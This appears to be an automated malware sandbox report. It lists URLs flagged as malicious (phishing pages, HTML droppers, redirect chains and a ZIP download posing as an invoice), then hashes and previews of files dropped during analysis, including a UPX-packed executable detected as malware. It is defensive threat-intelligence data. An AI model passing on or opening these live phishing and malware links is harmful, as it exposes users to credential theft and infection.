28a2c9bd18a11de089ef85a160da29e4 | http://www.npb.scforum.jp/jump.php?uid=991&url=//hellointerior.jp/product?url=https%3A%2F%2Ftimmoorhouse.co.uk%2Foki%2Fcucreationtechccreationtechl%2Fursula.vieira@creationtech.com | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | http://chnmqhb.com/LD51p689 | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://adclick.g.doubleclick.net/pcs/click?f8293meh8ap-2023-857497924696299379476644RtDbISfkd&&adurl=https://synergyconsulting.us | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://s1uju.mjt.lu/lnk/Aa0AAHzeL-AAAAAAAAAAAdSAuugAAYCsqJEAAAAAACbqRwBlhaC6Hhgd9HAYTryUV8KUPIVVGQAkLwY/1/ztVpfPwwX37lBlYILcm29g/aHR0cHM6Ly9nb2V4aXN0LmNvbQ | malicious | HtmlDropper, HTMLPhisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://forcandaians.blob.core.windows.net/forcandaians/url.html#cl/2303_md/1110/3079/674/28/289838 | malicious | Phisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://s1uju.mjt.lu/lnk/Aa0AAHzUSLgAAAAAAAAAAdSAuugAAYCsqJEAAAAAACbqRwBlhXOrTwoIzGZGR-Okagh-ihNXDwAkLwY/1/pD-vc4HduJrPGJDkhuro2w/aHR0cHM6Ly9zcmFtYWxsLm9yZw | malicious | HtmlDropper, HTMLPhisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://madriidbqrca.sa.com/bik/freshmontana | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://tardimed.com/rd/?TlAVZNnhZkUnzovXrrhewsbVZWUTTLmjIOfqRCWvaagkMQqKwQnJhiYTkXHqwxfqKwGRYWQ | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://my.visme.co/view/mxkm0ny3-smart-uk-automotive-ltd | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://my.visme.co/view/mxkm0ny3-smart-uk-automotive-ltd | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://www.uptodate.com/external-redirect?target_url=http%3A%2F%2Fapc.foundation%2Fwsm3To8Kvk-4Gr4RAdgQ3El-Q8Kvhs4RA-d5org&token=o1j24x8yqbCigYycIC6ni4B7VDe7Hz17hJNfy5f8gT3%2F1GKAFN45f%2BlZyQqB2Xd7&TOPIC_ID=119517 | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://weltechind.com/ | malicious | PayPal Phisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://s1uju.mjt.lu/lnk/Aa0AAHzaqYgAAAAAAAAAAdSAuugAAYCsqJEAAAAAACbqRwBlhZqIiq8cFIWIQ56xaLPcgUHZqgAkLwY/1/1-MAs2MOsYlWd8HtFTCmoQ/aHR0cHM6Ly9raW5ncm9vZmluZ3NlcnZpY2UuY29tLw | malicious | HtmlDropper, HTMLPhisher | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://www.uptodate.com/external-redirect?target_url=http%3A%2F%2Fpps.foundation%2Fjosull4RAvanl-Q8Kvw4RAngam3TQ3E-d58Kvo-y5&token=o1j24x8yqbCigYycIC6ni4B7VDe7Hz17hJNfy5f8gT3%2F1GKAFN45f%2BlZyQqB2Xd7&TOPIC_ID=119517 | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://trk.klclick3.com/ls/click?upn=-2FgaU8RLc6P7ZWBYySFmXjQ0P4X0wBP8bRWCeHJL28FigfvAh-2FwQ3qJ52EBcvbof8I5P6xAfpml8z7TniW-2FWxQvRuFLROMSBVcKgy9VJM2tkwRXZR8TVwVCOAiVcnqcuvdnXNQhD8-2Fg2liKoNwBrCMXH9dYeS9QJvyMO6N59zCG4-3D89Yx_Qng6PoYR30S3YpbpzFZ26LgIriatK0FSuI-2BhWJryzTfZCNrgf-2FFm4SytOfZHUV3A3-2B9-2F4B09o8bmiezN-2FGwmZk1otAmZHbJZwJ9iAY-2Fvhxr7B2ms3JTGAfBhEfEI-2BZpH6fDRrdV7imgKk-2FIFP7Z94enBwZIKE-2FRIpUsrN0ud5akDNVikJ0FWlX1NhVDdkTB0cfBpdlR89boP4R4gqzKGoRkxzcuUuC590Xb9eWGi6XV2HnHiRtMdaJr9MSrE8vF4-2FhwaNGYDie3HUnP99d9ZOWqUaFXOo4BFdXP2Bs7dYEexFPSSnbIi-2F9sFrFOkJKmlHis47t7An7wXntq38WUEDTKj4n2bWh5VgtoofEtidoOEQKgTKnvnSTH8uPmsbB3DR015jLZjVXCftP0IiLLbpbs81BXCrGkuHfcSeoVo9m67TjNcdBXzcL8d5QIVHxkhtGjL7-2FFiA-2BkP4LKyusiO3A-3D-3D | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://www.joesandbox.com/analysis/1366229 | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://pps.foundation/johnam3Than-d5dudlQ3Eyl-Qhorwam3Th-d58Kvo-d5uk&token=o1j24x8yqbCigYycIC6ni4B7VDe7Hz17hJNfy5f8gT3%2F1GKAFN45f%2BlZyQqB2Xd7&TOPIC_ID=119517 | malicious | Unknown | 173.222.162.32
28a2c9bd18a11de089ef85a160da29e4 | https://cld.pt/dl/download/c89835ff-781b-4959-be5a-67275492638b/CarrefourFacturaNOPAGO_REF19122023-A4-SIMPLEX-A9-TLLTK_FECHA20122023.zip | malicious | Unknown | 173.222.162.32
                                                                                                                                                                                        No context
                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):131840
                                                                                                                                                                                        Entropy (8bit):5.537536286594621
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:noA2EC/DdOb611qUFDjoA2QU/DWJb61PCUFe/oA2OA/DuFb614LUFqh:pxUFtlUF09UFa
                                                                                                                                                                                        MD5:9204821775860F2916C5345A284D1804
                                                                                                                                                                                        SHA1:A16FE7F54548F1E18B510871B4D049E9306220C3
                                                                                                                                                                                        SHA-256:AA98FD516AE3C31A189685AB146EB2CF657492FF4B3CA4DAB7CFE11352E6FF41
                                                                                                                                                                                        SHA-512:E518A6AB98ADCFA6E2F322942E1D46493827747BECF8F37D3C057A6C1F5DA010035AF7B8C43F1FBABD12275DF98D1777F9DC7A5E092E60BC1F019DBF11BBF57F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:........m...e.e.h#.."...3..........a.B...........v.............................................................................w.5.......^.......G.(.......>..............................................................................IA.,!Y...T...U..%.(P..x_exe_pathc:\users\user\desktop\officesetup.exeeC...@.,....4l..z..==Jy.;..hosteC..I?.,!Y..4l..z..==Jy.;..x_exe_pathc:\users\user\desktop\officesetup.exeeC...>.,......$s.A\.8|.vP.hosteC..<=.,.A....$s.A\.8|.vP.packageidmicrosoft.windows.explorereC..@<.,'A....$s.A\.8|.vP.windows_win32microsoft.windows.explorereC...;.,...C...?O..}-j:..hoste%<N<:.,.A.C...?O..}-j:..packageidmicrosoft.windows.explorere%<N@9.,'A.C...?O..}-j:..windows_win32microsoft.windows.explorere%<N.8.,.....g.,..... z..S;Z.lZv.N!hoste.~.B.f.,!K... z..S;Z.lZv.N!x_exe_pathc:\users\user\desktop\java.exee.~....C,....xX.%....^...._.hosteD.$....,..#..xX.%....^...._.packageid{6d809377-6af0-444b-8957-a3773f02200e}\adobe\acrobat dc\acrobat\acrobat.exeeD.$....,'.#..xX
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                        Entropy (8bit):3.174857563182266
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6:kKIlAN+SkQlPlEGYRMY9z+s3Ql2DUevat:ARkPlE99SCQl2DUevat
                                                                                                                                                                                        MD5:1F74494626BCB6B011CE0D4552A81914
                                                                                                                                                                                        SHA1:2B65A0CE57F353D8C7002272476D92AF5561A9AE
                                                                                                                                                                                        SHA-256:DA469E4D3012F1FA171BA1E0FCF595F58F433B66CCFF07B68E3C5EF3088C1E30
                                                                                                                                                                                        SHA-512:30BE11CE26F46656AD825598A76CF27C447D106759D223B0D28D87212DDB96C4B44A7D44B1F7B874A023D736B2D799FF7A4DF9BA4D6FED8647DEAFBE0A2A8130
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:p...... ........XB...5..(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (45174), with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):45182
                                                                                                                                                                                        Entropy (8bit):5.035881903277035
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:LMZG7xRKm1A1a/Qh/qLPvkc1mYyPdT9SWrRW:LLcrW
                                                                                                                                                                                        MD5:4CA54DDB0103D06971129D7733DBFF61
                                                                                                                                                                                        SHA1:2FFEF257617FDF189C83C17331D1550656D7E0A0
                                                                                                                                                                                        SHA-256:794F7217D2DD4F15DBB0D8168084DED15E759F207B79F3127EB7FF79B5BA7CE6
                                                                                                                                                                                        SHA-512:809DC1F9D82BE83EE6727E0A187E50F72797494651E3DF66F831FF3EB5D604BAC60E3D003330C9AA9694BBC46C82016CF6B1A4F71998E4B5259DAE1085DC661B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<root><item name="eventLogQueue_Online" value="[]" ltime="2630288056" htime="31077663" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1696333692425" ltime="2102739245" htime="31061487" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="2102740428" htime="31061487" /><item name="mdsb-v" value="8" ltime="2823990064" htime="31061487" /><item name="DSBMomentsCacheKey" value="{&quot;cacheTime&quot;:1696333765585,&quot;response&quot;:{&quot;SchemaVersion&quot;:&quot;1.1&quot;,&quot;ContentCollection&quot;:[{&quot;Date&quot;:&quot;20231003&quot;,&quot;Name&quot;:&quot;IOTD: WhitsundaySwirl&quot;,&quot;Order&quot;:1,&quot;IsMainColumnInLeft&quot;:true,&quot;Data&quot;:[{&quot;CardType&quot;:&quot;Hero&quot;,&quot;UXOrder&quot;:1,&quot;Cards&quot;:[{&quot;Scenario&quot;:&quot;ImageOfTheDay&quot;,&quot;UXTemplateName&quot;:&quot;DescriptiveHoverCard&quot;,&quot;FieldsStore&quot;:{&quot;Title&quot;:&quot;Whitehaven Beach, Whitsunday Island, Queen
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):37421
                                                                                                                                                                                        Entropy (8bit):4.611252091103942
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:6UjQxwcuyEZDqRKmJHGHly84yeiEaFHm2iLOOXYcc2jZ:b6y5U5Jkb4yej+vUOOoujZ
                                                                                                                                                                                        MD5:9BDE56D9C4532F269928C5CE1FF2560D
                                                                                                                                                                                        SHA1:FB816F6AAF8B7FF7CBB0B521A9D30BAA52CDDB7F
                                                                                                                                                                                        SHA-256:89DE51E447ED49F7748B3D9C077B97703629575241D5BE61EAB5D4196C6CECAD
                                                                                                                                                                                        SHA-512:DFB9548743887463AB6161D0972E6BB501BF4576D0CDAF1A7C7EE1E427DF59361BBD128D034AB45B68C8E48CA645022E39C5507A439074B30489E25F390760FF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:0.0....~.....~.....~.....~.....~.....~...~.....~.....~.....~.......~......~.......~.....~.....~.....~.....~......~.....~......~......~.......~.....~......~.....~.......~.......~......~.....~......~.......~.....~......~.....~.....~......~......~.....~......~.....~.............~.......~...md~...alc~..zune~..zord~..znip~..zip help~..zip file manager~..yourphone~..your phone~..yhis pc~..y pc~..y computer~..xxbox~..xox~..xontrol panel~..xonreol~..xnox~..xnipping~..xms~..xmd~..xls:wux:xls~..xhrome~..xcontrol~..xcmd~..xchrome~..xcalc~..xbxox~..xbv~..xbpx~..xboz~..xbox~..xboxx~..xboxc~..xbos~..xbop~..xboox~..xboix~..xboc~..xbob~..xbix~..xbb~..xamera~..xalc~..x86)~..x64)~..x box~..wyc~..wxcwl~..wxcel~..wword~..wsord~..wsnip~..wrord~..wrod~..wrodpad~..wqord~..wprd~..wprdpad~..wpord~..wowrd~..wotrd~..wotd~..wo
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5
                                                                                                                                                                                        Entropy (8bit):2.321928094887362
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Dy:W
                                                                                                                                                                                        MD5:34BD1DFB9F72CF4F86E6DF6DA0A9E49A
                                                                                                                                                                                        SHA1:5F96D66F33C81C0B10DF2128D3860E3CB7E89563
                                                                                                                                                                                        SHA-256:8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
                                                                                                                                                                                        SHA-512:E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:0.1..
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5
                                                                                                                                                                                        Entropy (8bit):2.321928094887362
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Ay:Ay
                                                                                                                                                                                        MD5:C204E9FAAF8565AD333828BEFF2D786E
                                                                                                                                                                                        SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                                                                                                                                                                                        SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                                                                                                                                                                                        SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:0.2..
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):50373
                                                                                                                                                                                        Entropy (8bit):3.7533011813000954
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:2crkq/9PYdKNAd1d0f41H1Ii0OyAAZXjLdk6nMUisfhteVoVPPP8qoEYhk5+6DC3:2ckq/1YdKNAd1d0f41H1Ii5yAAZXHdep
                                                                                                                                                                                        MD5:42C6CF763BC1DCEFD79C0E5262E7DFC4
                                                                                                                                                                                        SHA1:2EAA3A2B1557ED78CA1166EB007608137E52C343
                                                                                                                                                                                        SHA-256:99205F34B2E4960BE69575908CF5BC9C57A32A240105848EE998E1E79F240707
                                                                                                                                                                                        SHA-512:73B48317D927329B24F59C164CEA53D0A8AF6456F8CD8F93A285286696626E15B1E2BE286A39310D4772A6263D6AB43710A07392B501324732FADBF8F50DB487
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:................h...."cmd"~........A%..*aint~.........+r~........A,#A..A0..192~.........2016~........A3.A60A7.A[bAa,.b@..ck..d|(.e...f'..g*..h6..iq..j..AkG.l...m2..n~..o...p...q..Ar_.s...t>..u..Av.w...x...y..AzWB.RA..A.IC..UA......A.c..~........C.LA..C.(I..Cpre..run%~.........fetch%~.........ail~.........stsc~.........cmd~.........run~.........utlook~.........2-bit)~........Id.A ..~.........viewer~.........4-bit)~......... zip~........D-zip.Iz3A ..~........Ffile m..help~.........anager~.........fm~.........ip~........Aa..paint~.........int~.........omt~........CbouMAc.Ad.Ae..kype~........Al..mil~........An.Apa.rJ.As.At.Au..zure~.........t java~.........alc~........DcessS.ess~.........lc~.........md~.........on~.........robat~........G contro..s~.........~........Ol:wux:a.Occess c..ontrol~........Eapter%.b~........Ad"Cmin4Eobe a=Jva.F:wux:a..~.........dapter~........Fress b..~........Oook:wux.O:addres..s book~........E cmd:.Jis.Owux:adm..in cmd~........Otrative.. tools~........
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):1126006
                                                                                                                                                                                        Entropy (8bit):6.147114410359821
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:AoLr7YfoyFxz8GfoLr7YfoyFxz8G21it:AMwf1xz8GfMwf1xz8G2
                                                                                                                                                                                        MD5:5665CA72FB1FE8FF993E1F56C8EDB387
                                                                                                                                                                                        SHA1:11C371B293397DEE3289435CC6F797110D5A631B
                                                                                                                                                                                        SHA-256:263D203F23A1E59D7FECA90148F7ED49333CD1CC607C58B4EEEDC1BF3A84F8C8
                                                                                                                                                                                        SHA-512:5601C99D230FC811D192E23B4537048A86200532CE5A402749FCF687BBC23DF2E52CC3E8597E79E94A4E7CCF8945C825EA2A7EB93DD9A1F2204F28501E7FDBA1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling.fE.h...K........~<~i..'..uT..r..7.c..l.s..P.x..c.k....p....'..CR*a..Qn...a.,[.o2..t.u}.,{f.m.Q..e ;.w.0..l..(.y..P......gy..d.:&.i.;.[..n.b....j.z#.@.E.Q!..Q......N.Q/...`.z.Qh.7.f..+.4.. . ....v..L.8..Q6#.Q\..Qq.B.;.}..0....9...A5...X.Qz.H.7.'..%. .Q3.8.....Q21/...M.Q.kQ-..."""""""jo..&.I.Q+.uQ1j...j.a:..Ab...;b...Q...'.<...#?< ..a_C..b]<3../.<...Ae..t!...u...Qb...n....y._.Qj.{Ql =.p.S..m)o..k...Qo..Qh..Q;7CQi1..w2..Qf.2Qd8h.r....sE...a.<..cZ... \...z."..,me<ume.Q.z5Qxx.av>.*Q[@R.24<u 24.ig...At.Qnv.Q .'Qo0xae....yo<uetoDam"...k<ue k.Qs.0ab..=&i<ue i+..j<ue jhQd..Qr..Qc.`&p<ue p...a<ue a.&w<ue w..&f<ue f..&h<ue h...v<ue v.Ql..&.<ube....g<ue g....<uetoet<uet..TUh<uet..&u<ueto..&p<ueto..%y<uet..cr<u...Re<...i<uetoMa<...-o<eto...o(...o(...ter*et...ute.eute..luetjuey...st* ta..s<unes%e<unew..n<ueenfj<u....men+e n...t<uetbs<..X%j<uej...2<ue2M%b<ueb[.%g<ueg...h<ueh.%v<uev1.%c<uec..%p<uep6.%f<uef..j<uo...ue
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):114941
                                                                                                                                                                                        Entropy (8bit):5.179500563537803
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"
                                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):114941
                                                                                                                                                                                        Entropy (8bit):5.179500563537803
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):116224
                                                                                                                                                                                        Entropy (8bit):5.299415324250664
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:3iLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:3iyvRmDLs/ZrwWjjAqGcfzWH
                                                                                                                                                                                        MD5:EA8543BCC2E4689874647E2507DA6B29
                                                                                                                                                                                        SHA1:A98ACF8A9F445292FEDF5E353C8AB4106085190C
                                                                                                                                                                                        SHA-256:9CD73E36C637070F5143A84D05BCDCCEC788AF1D28E474B05E60D37D1F83076B
                                                                                                                                                                                        SHA-512:1508785EFC9F925BC0E34D189E74C045BB64809AC9E7E7A933DCED9BB2A3791B3C63871928811EBA6DC87542A8AFDA8B6357853C486D4CEF02E856A9CD330884
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L...@..T.............................Z............@.....................................................................................X...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@....imports............................@...........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                                                        Entropy (8bit):5.299488057565489
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.66%
• UPX compressed Win32 Executable (30571/9) 0.30%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: java.exe
File size: 116'224 bytes
MD5: 91493a9a9e83a7b48d178ae10f97028d
SHA1: 7f774f01e7f3768de1802226fb6ab15242bea878
SHA256: 79dc8da8c5f7b41a0eed67e10e5239355be1c6e089738138dfa3b753fe019355
SHA512: b9c3c7899a643dff3a2bcdfb1e30137cc60b9a004e03515748f6db97bdb8939cb0c69f444e2a7df8d6fb7cdc0f331ca70c19120b126dee5ca81e98efc575eb1e
SSDEEP: 1536:1iLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:1iyvRmDLs/ZrwWjjAqGcfzWH
TLSH: A8B34B62F204E89BE817D8F29919CD3164A37DBC88A0455E32D97F6D58B3AD30859F0F
